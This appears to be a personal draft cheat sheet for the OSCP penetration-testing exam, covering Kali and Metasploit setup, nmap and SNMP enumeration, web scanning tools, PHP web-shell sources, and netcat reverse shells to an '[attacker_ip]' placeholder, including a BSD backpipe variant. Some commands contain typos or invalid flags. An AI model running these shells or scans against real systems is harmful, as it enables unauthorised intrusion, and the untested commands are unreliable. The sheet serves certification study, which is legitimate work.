 ___  ___  ___ _ __     ___| |__   ___  __ _| |_   ___| |__   ___  ___| |_ 
 / _ \/ __|/ __| '_ \   / __| '_ \ / _ \/ _` | __| / __| '_ \ / _ \/ _ \ __|
| (_) \__ \ (__| |_) | | (__| | | |  __/ (_| | |_  \__ \ | | |  __/  __/ |_ 
 \___/|___/\___| .__/   \___|_| |_|\___|\__,_|\__| |___/_| |_|\___|\___|\__|
               |_|

 _                 _                   _           
| |_ _ __ _   _   | |__   __ _ _ __ __| | ___ _ __ 
| __| '__| | | |  | '_ \ / _` | '__/ _` |/ _ \ '__|
| |_| |  | |_| |  | | | | (_| | | | (_| |  __/ |   
 \__|_|   \__, |  |_| |_|\__,_|_|  \__,_|\___|_|   
          |___/                                    

#remmeber most of these need root but I've not included SUDO because Kali doesn't feature this :)

##############################
#OSCP Cheat Sheet by Dan Card#
##############################
#Kali Setup & Command Reference
#DRAFT not tested

####################
# UPDATE KALI
################
apt-get update; apt-get upgrade

##################################################
# SETUP VM TOOLS FOR SHARED FOLDERS AND COPY PASTA
##################################################

apt-get install openvmfstools
There are shell scripts to run to enable this

##############################
# Update Python
##############################
apt-get install python-dev
apt-get instal python-pip
apt-get install python2.7-dev
apt-get install python2.7-pip
apt-get install python3-dev
apt-get install python3-pip

####################
#Terminal Management
####################
#User terminator, Byobu.co and or TMUX

apt-get install terminator
apt-get install tmux
	apt-get install byobu


###############
# SETUP MSF
###############
#setup postgreSQL to start by default
update-rc.d postgresql enable
#rebuild search cache
msfdb init
msfdb status
msfconsole
db_status
db_connect msf:msf@127.0.0.1:5432/msf
db_rebuild_cache
db_status

#setup global variables in MSF
set GLHOST 10.10.10.10
set GLPORT 4444

#########################
#SIMPLE PYTHON WEB SERVER
########################
python -m SimpleHTTPServer 80

#####################################
# Get all the tools into /pentest
#####################################
mkdir /pentest
mkdir /pentest/tools
mkdir /pentest/oscp
mkdir /pentest/htb

####################################
# ENUMERATION
#####################################
###find ip and arpy things
netdiscover -i eth0
#add things to host files if that's appropriate

#NMAP ALL THE THINGS

nmap -pN -sS -sV -T4 -O -A -oA -v -v -v -v [targetname_tcpq] [targetIP/name]
nmap -pN -sU -sV -T4 -O -A -oA -v -v -v -v [targetname_udpq] [targetIP/name]
nmap -pN -p- -sS -sV -T4 -O -A -oA -v -v -v -v [targetname_tcpf] [targetIP/name]
nmap -pN -p- -sU -sV -T4 -O -A -oA -v -v -v -v [targetname_tcpf] [targetIP/name]

#check for SNMP
### check snmp public community string with version 1 (change as requred)
snmp-check [target_ip] -c public -v 1
#########if found walk it#############
snmpwalk -v 1 -c public [target ip]

#####################################
# Web Application Enumeration Tools
#####################################
# run wafw00f to start with to check for application firewalls
# CMSMAP for scanning content management systems
# nikto for web application vulnerability scanning
# wpscan for wordpress
# joomscan for joomla

#curl the robots.txt file
curl http://[target_ip]/robots.txt


#forced browsing
#gobuster
#install
mkdir /pentest/
mkdir /pentest/tools
cd /pentest/tools
git clone https://github.com/OJ/gobuster.git

###########################WORDPRESS SCANNING#######################################
wpscan --url http://[target_ip] --enumerate p --enumerate u --enumerate t

#######################
### WEB SHELLS ########
#######################
##########PHP SHELLS################
#PHP BASH
cd /pentest/tools
#https://github.com/Arrexel/phpbash
git clone https://github.com/Arrexel/phpbash.git
#php-reverse-shell
http://pentestmonkey.net/tools/web-shells/php-reverse-shell

######################################
######NETCAT shells on target
#######################################
nc [attacker_ip] 1234 -e /bin/sh

#################LISTENERS#################################

####a simple netcat listener on TCP 1234
nc -v -n -l -p 1234

### an msf listener
msfconsole

#what do you do if its BSD and doesn't have -e as an option!?

mknod /tmp/backpipe p 
/bin/sh 0</tmp/backpipe | nc [attacker_ip] 1234 1>/tmp/backpipe

#sweeeeet!


###################LINUX ENUMERATION#################################
#ok so ideally use a tool such as linenum.sh however we need to know what to do manualy.
#so first thing is first let's see who I am?
whoami
#now let's check my hostname
hostname
#now let's see what OS version I'm running
uname -a # -a is important to get all
#now let's see what access i have
#######

#now let's see if I can run anything with elevated access
sudo -l

